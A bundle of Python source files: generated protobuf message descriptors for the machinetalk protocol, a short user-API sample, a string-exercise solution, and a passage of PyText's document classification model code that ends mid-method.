name='userarg1', full_name='machinetalk.Member.userarg1', index=1,
number=2, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='epsilon', full_name='machinetalk.Member.epsilon', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='signal', full_name='machinetalk.Member.signal', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='groupname', full_name='machinetalk.Member.groupname', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Member.handle', index=5,
number=6, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pin', full_name='machinetalk.Member.pin', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='param', full_name='machinetalk.Member.param', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\307\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2425,
serialized_end=2654,
)
_GROUP = _descriptor.Descriptor(
name='Group',
full_name='machinetalk.Group',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Group.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Group.handle', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='userarg1', full_name='machinetalk.Group.userarg1', index=2,
number=4, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='userarg2', full_name='machinetalk.Group.userarg2', index=3,
number=5, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='refcount', full_name='machinetalk.Group.refcount', index=4,
number=6, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='member', full_name='machinetalk.Group.member', index=5,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\310\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2657,
serialized_end=2793,
)
_PROTOCOLPARAMETERS = _descriptor.Descriptor(
name='ProtocolParameters',
full_name='machinetalk.ProtocolParameters',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='keepalive_timer', full_name='machinetalk.ProtocolParameters.keepalive_timer', index=0,
number=1, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='group_timer', full_name='machinetalk.ProtocolParameters.group_timer', index=1,
number=2, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='rcomp_timer', full_name='machinetalk.ProtocolParameters.rcomp_timer', index=2,
number=3, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\311\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2795,
serialized_end=2890,
)
_VTABLE = _descriptor.Descriptor(
name='Vtable',
full_name='machinetalk.Vtable',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Vtable.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Vtable.handle', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='owner_id', full_name='machinetalk.Vtable.owner_id', index=2,
number=3, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='context', full_name='machinetalk.Vtable.context', index=3,
number=5, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='refcount', full_name='machinetalk.Vtable.refcount', index=4,
number=6, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='version', full_name='machinetalk.Vtable.version', index=5,
number=7, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='vtable', full_name='machinetalk.Vtable.vtable', index=6,
number=8, type=6, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\312\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2893,
serialized_end=3025,
)
_INST = _descriptor.Descriptor(
name='Inst',
full_name='machinetalk.Inst',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Inst.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='comp_id', full_name='machinetalk.Inst.comp_id', index=1,
number=2, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='inst_id', full_name='machinetalk.Inst.inst_id', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='inst_size', full_name='machinetalk.Inst.inst_size', index=3,
number=4, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='vtable', full_name='machinetalk.Inst.vtable', index=4,
number=5, type=6, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pin', full_name='machinetalk.Inst.pin', index=5,
number=16, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='param', full_name='machinetalk.Inst.param', index=6,
number=17, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='funct', full_name='machinetalk.Inst.funct', index=7,
number=19, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\313\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3028,
serialized_end=3229,
)
_SERVICEANNOUNCEMENT.fields_by_name['stype'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._SERVICETYPE
_SERVICEANNOUNCEMENT.fields_by_name['api'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._SERVICEAPI
_ORIGINATOR.fields_by_name['origin'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._ORIGINTYPE
_ORIGINATOR.fields_by_name['detail'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._ORIGINDETAIL
_ORIGINATOR.fields_by_name['instance'].message_type = _INSTANCE
_ANERROR.fields_by_name['severity'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._SEVERITY
_ANERROR.fields_by_name['origin'].message_type = _ORIGINATOR
_PIN.fields_by_name['type'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._VALUETYPE
_PIN.fields_by_name['dir'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._HALPINDIRECTION
_SIGNAL.fields_by_name['type'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._VALUETYPE
_PARAM.fields_by_name['type'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._VALUETYPE
_PARAM.fields_by_name['dir'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._HALPARAMDIRECTION
_FUNCTION.fields_by_name['type'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._HALFUNCTTYPE
_COMPONENT.fields_by_name['pin'].message_type = _PIN
_COMPONENT.fields_by_name['param'].message_type = _PARAM
_COMPONENT.fields_by_name['funct'].message_type = _FUNCTION
_MEMBER.fields_by_name['mtype'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._OBJECTTYPE
_MEMBER.fields_by_name['signal'].message_type = _SIGNAL
_MEMBER.fields_by_name['pin'].message_type = _PIN
_MEMBER.fields_by_name['param'].message_type = _PARAM
_GROUP.fields_by_name['member'].message_type = _MEMBER
_INST.fields_by_name['pin'].message_type = _PIN
_INST.fields_by_name['param'].message_type = _PARAM
_INST.fields_by_name['funct'].message_type = _FUNCTION
DESCRIPTOR.message_types_by_name['Instance'] = _INSTANCE
DESCRIPTOR.message_types_by_name['ServiceAnnouncement'] = _SERVICEANNOUNCEMENT
DESCRIPTOR.message_types_by_name['Originator'] = _ORIGINATOR
DESCRIPTOR.message_types_by_name['AnError'] = _ANERROR
DESCRIPTOR.message_types_by_name['Pin'] = _PIN
DESCRIPTOR.message_types_by_name['Signal'] = _SIGNAL
DESCRIPTOR.message_types_by_name['Param'] = _PARAM
DESCRIPTOR.message_types_by_name['Function'] = _FUNCTION
DESCRIPTOR.message_types_by_name['Thread'] = _THREAD
DESCRIPTOR.message_types_by_name['Component'] = _COMPONENT
DESCRIPTOR.message_types_by_name['Ring'] = _RING
DESCRIPTOR.message_types_by_name['Member'] = _MEMBER
DESCRIPTOR.message_types_by_name['Group'] = _GROUP
DESCRIPTOR.message_types_by_name['ProtocolParameters'] = _PROTOCOLPARAMETERS
DESCRIPTOR.message_types_by_name['Vtable'] = _VTABLE
DESCRIPTOR.message_types_by_name['Inst'] = _INST
Instance = _reflection.GeneratedProtocolMessageType('Instance', (_message.Message,), dict(
DESCRIPTOR = _INSTANCE,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Instance)
))
_sym_db.RegisterMessage(Instance)
ServiceAnnouncement = _reflection.GeneratedProtocolMessageType('ServiceAnnouncement', (_message.Message,), dict(
DESCRIPTOR = _SERVICEANNOUNCEMENT,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.ServiceAnnouncement)
))
_sym_db.RegisterMessage(ServiceAnnouncement)
Originator = _reflection.GeneratedProtocolMessageType('Originator', (_message.Message,), dict(
DESCRIPTOR = _ORIGINATOR,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Originator)
))
_sym_db.RegisterMessage(Originator)
AnError = _reflection.GeneratedProtocolMessageType('AnError', (_message.Message,), dict(
DESCRIPTOR = _ANERROR,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.AnError)
))
_sym_db.RegisterMessage(AnError)
Pin = _reflection.GeneratedProtocolMessageType('Pin', (_message.Message,), dict(
DESCRIPTOR = _PIN,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Pin)
))
_sym_db.RegisterMessage(Pin)
Signal = _reflection.GeneratedProtocolMessageType('Signal', (_message.Message,), dict(
DESCRIPTOR = _SIGNAL,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Signal)
))
_sym_db.RegisterMessage(Signal)
Param = _reflection.GeneratedProtocolMessageType('Param', (_message.Message,), dict(
DESCRIPTOR = _PARAM,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Param)
))
_sym_db.RegisterMessage(Param)
Function = _reflection.GeneratedProtocolMessageType('Function', (_message.Message,), dict(
DESCRIPTOR = _FUNCTION,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Function)
))
_sym_db.RegisterMessage(Function)
Thread = _reflection.GeneratedProtocolMessageType('Thread', (_message.Message,), dict(
DESCRIPTOR = _THREAD,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Thread)
))
_sym_db.RegisterMessage(Thread)
Component = _reflection.GeneratedProtocolMessageType('Component', (_message.Message,), dict(
DESCRIPTOR = _COMPONENT,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Component)
))
_sym_db.RegisterMessage(Component)
Ring = _reflection.GeneratedProtocolMessageType('Ring', (_message.Message,), dict(
DESCRIPTOR = _RING,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Ring)
))
_sym_db.RegisterMessage(Ring)
Member = _reflection.GeneratedProtocolMessageType('Member', (_message.Message,), dict(
DESCRIPTOR = _MEMBER,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Member)
))
_sym_db.RegisterMessage(Member)
Group = _reflection.GeneratedProtocolMessageType('Group', (_message.Message,), dict(
DESCRIPTOR = _GROUP,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Group)
))
_sym_db.RegisterMessage(Group)
ProtocolParameters = _reflection.GeneratedProtocolMessageType('ProtocolParameters', (_message.Message,), dict(
DESCRIPTOR = _PROTOCOLPARAMETERS,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.ProtocolParameters)
))
_sym_db.RegisterMessage(ProtocolParameters)
Vtable = _reflection.GeneratedProtocolMessageType('Vtable', (_message.Message,), dict(
DESCRIPTOR = _VTABLE,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Vtable)
))
_sym_db.RegisterMessage(Vtable)
Inst = _reflection.GeneratedProtocolMessageType('Inst', (_message.Message,), dict(
DESCRIPTOR = _INST,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Inst)
))
_sym_db.RegisterMessage(Inst)
_INSTANCE.has_options = True
_INSTANCE._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\274\005'))
_SERVICEANNOUNCEMENT.has_options = True
_SERVICEANNOUNCEMENT._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\275\005'))
_ORIGINATOR.has_options = True
_ORIGINATOR._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\276\005'))
_ANERROR.has_options = True
_ANERROR._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\277\005'))
_PIN.has_options = True
_PIN._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\300\005'))
_SIGNAL.has_options = True
_SIGNAL._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\301\005'))
_PARAM.has_options = True
_PARAM._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\302\005'))
_FUNCTION.has_options = True
_FUNCTION._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\303\005'))
_THREAD.has_options = True
_THREAD._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\304\005'))
_COMPONENT.has_options = True
_COMPONENT._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\305\005'))
_RING.has_options = True
_RING._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\306\005'))
_MEMBER.has_options = True
_MEMBER._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\307\005'))
_GROUP.has_options = True
_GROUP._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\310\005'))
_PROTOCOLPARAMETERS.has_options = True
_PROTOCOLPARAMETERS._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\311\005'))
_VTABLE.has_options = True
_VTABLE._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\312\005'))
_INST.has_options = True
_INST._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\313\005'))
# @@protoc_insertion_point(module_scope)
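# ---------------------------------------------------------------------------
# Usage sketch: the message classes generated above behave like ordinary
# protobuf messages. This block runs only when the module is executed
# directly; the field values are illustrative assumptions, not machinetalk
# conventions.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    pin = Pin()
    pin.name = "demo.out"           # hypothetical pin name
    pin.halbit = True               # value carried in the HAL bit slot
    wire = pin.SerializeToString()  # encode to proto2 wire format
    decoded = Pin()
    decoded.ParseFromString(wire)   # lossless round trip
    assert decoded.name == "demo.out" and decoded.halbit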
# ---------------------------------------------------------------------------
# End of machinetalk/protobuf/object_pb2.py (author: [email protected]).
# Next file: sample/get_user_by_device_id.py
# from repo BlueLens/stylelens-user (no license, UTF-8, Python).
# ---------------------------------------------------------------------------
from __future__ import print_function
from stylelens_user.users import Users
from pprint import pprint
api_instance = Users()
device_id = "xxxx"
try:
api_response = api_instance.get_user_by_device_id(device_id)
pprint(api_response)
except Exception as e:
print("Exception when calling get_user_by_device_id: %s\n" % e)
# ---------------------------------------------------------------------------
# End of sample/get_user_by_device_id.py (author: [email protected]).
# Next file: fYMjhe7BnijXwfNpF_6.py
# from repo daniel-reich/turbo-robot (no license, UTF-8, Python).
# ---------------------------------------------------------------------------
"""
Create a function that takes a string and returns the first character of every
word if the length of the word is even and the middle character if the length
of the word is odd.
### Examples
stmid("Alexa have to paid") ➞ "ehtp"
# "e" is the middle character of "Alexa"
# "h" is the first character of "have"
stmid("Th3 0n3 4nd 0n1y") ➞ "hnn0"
stmid("who is the winner") ➞ "hihw"
### Notes
N/A
"""
def stmid(string):
    words = string.split()
    result = ''
    for word in words:
        if len(word) % 2:
            # Odd length: take the middle character.
            result += word[len(word) // 2]
        else:
            # Even length: take the first character.
            result += word[0]
    return result
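# Quick sanity check against the docstring examples above (runs only when
# this file is executed directly):
if __name__ == "__main__":
    print(stmid("Alexa have to paid"))  # -> ehtp
    print(stmid("Th3 0n3 4nd 0n1y"))    # -> hnn0
    print(stmid("who is the winner"))   # -> hihw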
# ---------------------------------------------------------------------------
# End of fYMjhe7BnijXwfNpF_6.py (author: [email protected]).
# Next file: pytext/models/doc_model.py
# from repo haowu666/pytext (license: BSD-3-Clause, UTF-8, Python).
# ---------------------------------------------------------------------------
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from typing import Dict, List, Optional, Union
import torch
from pytext.config import ConfigBase
from pytext.config.component import create_loss
from pytext.data.tensorizers import (
ByteTokenTensorizer,
FloatListTensorizer,
LabelTensorizer,
NumericLabelTensorizer,
Tensorizer,
TokenTensorizer,
)
from pytext.data.utils import PAD, UNK
from pytext.exporters.exporter import ModelExporter
from pytext.loss import BinaryCrossEntropyLoss
from pytext.models.decoders.mlp_decoder import MLPDecoder
from pytext.models.embeddings import CharacterEmbedding, EmbeddingList, WordEmbedding
from pytext.models.model import Model
from pytext.models.module import create_module
from pytext.models.output_layers import ClassificationOutputLayer, RegressionOutputLayer
from pytext.models.output_layers.doc_classification_output_layer import (
BinaryClassificationOutputLayer,
MulticlassOutputLayer,
)
from pytext.models.representations.bilstm_doc_attention import BiLSTMDocAttention
from pytext.models.representations.docnn import DocNNRepresentation
from pytext.models.representations.pure_doc_attention import PureDocAttention
from pytext.utils.torch import (
Vocabulary,
make_byte_inputs,
make_sequence_lengths,
pad_2d,
)
from torch import jit
class DocModel_Deprecated(Model):
"""
An n-ary document classification model. It can be used for all text
classification scenarios. It supports :class:`~PureDocAttention`,
:class:`~BiLSTMDocAttention` and :class:`~DocNNRepresentation` as the ways
    to represent the document, followed by a multi-layer perceptron
    (:class:`~MLPDecoder`) that projects the document representation into the
    label/target space.
It can be instantiated just like any other :class:`~Model`.
DEPRECATED: Use DocModel instead
"""
class Config(ConfigBase):
representation: Union[
PureDocAttention.Config,
BiLSTMDocAttention.Config,
DocNNRepresentation.Config,
] = BiLSTMDocAttention.Config()
decoder: MLPDecoder.Config = MLPDecoder.Config()
output_layer: ClassificationOutputLayer.Config = (
ClassificationOutputLayer.Config()
)
class DocModel(Model):
"""DocModel that's compatible with the new Model abstraction, which is responsible
for describing which inputs it expects and arranging its input tensors."""
__EXPANSIBLE__ = True
class Config(Model.Config):
class ModelInput(Model.Config.ModelInput):
tokens: TokenTensorizer.Config = TokenTensorizer.Config()
dense: Optional[FloatListTensorizer.Config] = None
labels: LabelTensorizer.Config = LabelTensorizer.Config()
inputs: ModelInput = ModelInput()
embedding: WordEmbedding.Config = WordEmbedding.Config()
representation: Union[
PureDocAttention.Config,
BiLSTMDocAttention.Config,
DocNNRepresentation.Config,
] = BiLSTMDocAttention.Config()
decoder: MLPDecoder.Config = MLPDecoder.Config()
output_layer: ClassificationOutputLayer.Config = (
ClassificationOutputLayer.Config()
)
def arrange_model_inputs(self, tensor_dict):
tokens, seq_lens, _ = tensor_dict["tokens"]
model_inputs = (tokens, seq_lens)
if "dense" in tensor_dict:
model_inputs += (tensor_dict["dense"],)
return model_inputs
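    # Contract sketch (shapes are assumptions, for batch size B and max
    # sequence length T):
    #   tensor_dict["tokens"] -> (token_ids [B x T], seq_lens [B], unused)
    #   tensor_dict["dense"]  -> optional float features [B x dense_dim]
    # so forward() receives (tokens, seq_lens), plus the dense tensor when a
    # dense tensorizer is configured.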
def arrange_targets(self, tensor_dict):
return tensor_dict["labels"]
def get_export_input_names(self, tensorizers):
res = ["tokens", "tokens_lens"]
if "dense" in tensorizers:
res += ["float_vec_vals"]
return res
def get_export_output_names(self, tensorizers):
return ["scores"]
def vocab_to_export(self, tensorizers):
return {"tokens": list(tensorizers["tokens"].vocab)}
def caffe2_export(self, tensorizers, tensor_dict, path, export_onnx_path=None):
exporter = ModelExporter(
ModelExporter.Config(),
self.get_export_input_names(tensorizers),
self.arrange_model_inputs(tensor_dict),
self.vocab_to_export(tensorizers),
self.get_export_output_names(tensorizers),
)
return exporter.export_to_caffe2(self, path, export_onnx_path=export_onnx_path)
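    # Export sketch (the path is illustrative; tensor_dict must hold a
    # populated batch from the data pipeline):
    #
    #   model.caffe2_export(tensorizers, tensor_dict, "/tmp/doc_model.c2")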
def torchscriptify(self, tensorizers, traced_model):
output_layer = self.output_layer.torchscript_predictions()
input_vocab = tensorizers["tokens"].vocab
class Model(jit.ScriptModule):
def __init__(self):
super().__init__()
self.vocab = Vocabulary(input_vocab, unk_idx=input_vocab.idx[UNK])
self.model = traced_model
self.output_layer = output_layer
self.pad_idx = jit.Attribute(input_vocab.idx[PAD], int)
@jit.script_method
def forward(self, tokens: List[List[str]]):
seq_lens = make_sequence_lengths(tokens)
word_ids = self.vocab.lookup_indices_2d(tokens)
word_ids = pad_2d(word_ids, seq_lens, self.pad_idx)
logits = self.model(torch.tensor(word_ids), torch.tensor(seq_lens))
return self.output_layer(logits)
class ModelWithDenseFeat(jit.ScriptModule):
def __init__(self):
super().__init__()
self.vocab = Vocabulary(input_vocab, unk_idx=input_vocab.idx[UNK])
self.model = traced_model
self.output_layer = output_layer
self.pad_idx = jit.Attribute(input_vocab.idx[PAD], int)
@jit.script_method
def forward(self, tokens: List[List[str]], dense_feat: List[List[float]]):
seq_lens = make_sequence_lengths(tokens)
word_ids = self.vocab.lookup_indices_2d(tokens)
word_ids = pad_2d(word_ids, seq_lens, self.pad_idx)
logits = self.model(
torch.tensor(word_ids),
torch.tensor(seq_lens),
torch.tensor(dense_feat),
)
return self.output_layer(logits)
return ModelWithDenseFeat() if "dense" in tensorizers else Model()
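    # Scripted-model usage sketch (assumes a traced forward produced by the
    # training pipeline; inputs are pre-tokenized):
    #
    #   scripted = model.torchscriptify(tensorizers, traced_model)
    #   scores = scripted([["play", "some", "music"]])
    #
    # Vocab lookup and padding happen inside the scripted module, so no
    # Python-side tensorizers are needed at serving time.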
@classmethod
def create_embedding(cls, config: Config, tensorizers: Dict[str, Tensorizer]):
return create_module(
config.embedding,
tensorizer=tensorizers["tokens"],
init_from_saved_state=config.init_from_saved_state,
)
@classmethod
def create_decoder(cls, config: Config, representation_dim: int, num_labels: int):
num_decoder_modules = 0
in_dim = representation_dim
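        # A configured dense-feature input is concatenated with the learned
        # representation before decoding, so the decoder input must be wider.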
if hasattr(config.inputs, "dense") and config.inputs.dense:
num_decoder_modules += 1
in_dim += config.inputs.dense.dim
decoder = create_module(config.decoder, in_dim=in_dim, out_dim=num_labels)
decoder.num_decoder_modules = num_decoder_modules
return decoder

    @classmethod
def from_config(cls, config: Config, tensorizers: Dict[str, Tensorizer]):
labels = tensorizers["labels"].vocab
embedding = cls.create_embedding(config, tensorizers)
representation = create_module(
config.representation, embed_dim=embedding.embedding_dim
)
decoder = cls.create_decoder(
config, representation.representation_dim, len(labels)
)
loss = create_loss(config.output_layer.loss)
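        # Match the output layer to the configured loss: binary cross-entropy
        # pairs with the binary classification layer, anything else with the
        # multiclass layer.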
output_layer_cls = (
BinaryClassificationOutputLayer
if isinstance(loss, BinaryCrossEntropyLoss)
else MulticlassOutputLayer
)
output_layer = output_layer_cls(list(labels), loss)
return cls(embedding, representation, decoder, output_layer)


class ByteTokensDocumentModel(DocModel):
"""
DocModel that receives both word IDs and byte IDs as inputs (concatenating
word and byte-token embeddings to represent input tokens).
"""

    class Config(DocModel.Config):
class ByteModelInput(DocModel.Config.ModelInput):
token_bytes: ByteTokenTensorizer.Config = ByteTokenTensorizer.Config()

        inputs: ByteModelInput = ByteModelInput()
byte_embedding: CharacterEmbedding.Config = CharacterEmbedding.Config()
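
    # Build a word embedding and a byte-level CharacterEmbedding over the same
    # input column, then concatenate them into one token representation.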
@classmethod
def create_embedding(cls, config, tensorizers: Dict[str, Tensorizer]):
word_tensorizer = config.inputs.tokens
byte_tensorizer = config.inputs.token_bytes
        assert (
            word_tensorizer.column == byte_tensorizer.column
        ), "Word-level and byte-level tensorizers must read the same column"
word_embedding = create_module(
config.embedding, tensorizer=tensorizers["tokens"]
)
byte_embedding = CharacterEmbedding(
ByteTokenTensorizer.NUM_BYTES,
config.byte_embedding.embed_dim,
config.byte_embedding.cnn.kernel_num,
config.byte_embedding.cnn.kernel_sizes,
config.byte_embedding.highway_layers,
config.byte_embedding.projection_dim,
)
return EmbeddingList([word_embedding, byte_embedding], concat=True)

    def arrange_model_inputs(self, tensor_dict):
tokens, seq_lens, _ = tensor_dict["tokens"]
token_bytes, byte_seq_lens, _ = tensor_dict["token_bytes"]
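        # Both tensorizers read the same column, so per-example sequence
        # lengths must agree between the word and byte views.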
assert (seq_lens == byte_seq_lens).all().item()
return tokens, token_bytes, seq_lens

    def get_export_input_names(self, tensorizers):
return ["tokens", "token_bytes", "tokens_lens"]

    def torchscriptify(self, tensorizers, traced_model):
